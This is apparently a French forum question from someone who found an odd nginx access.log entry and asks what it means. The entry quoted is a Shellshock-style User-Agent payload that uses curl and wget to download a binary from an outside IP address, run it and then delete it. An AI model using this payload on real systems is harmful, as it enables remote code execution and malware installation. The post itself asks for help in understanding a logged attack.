Aujourd'hui, j'ai accidentellement découvert un journal très étrange dans le access.log de nginx sur le serveur de l'entreprise :

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

Quand il s'agit d'endroits bizarres :

1. Utilisation de http1.0

2. user-agent est un script

J'ai cherché sur Internet et n'ai trouvé aucune information sur l'utilisation d'un agent utilisateur pour attaquer. Bien que j'aie pu obtenir le code du script en suivant l'adresse dans le journal, mes capacités étaient limitées et je n'ai pas pu analyser la cible de l'attaque.

Excusez-moi, des experts, avez-vous des informations et une expérience pertinentes ? Partagez-le avec moi, merci beaucoup ! !

Ajouté :

Sous quelle configuration de nginx analysera-t-il le contenu dans l'agent utilisateur ?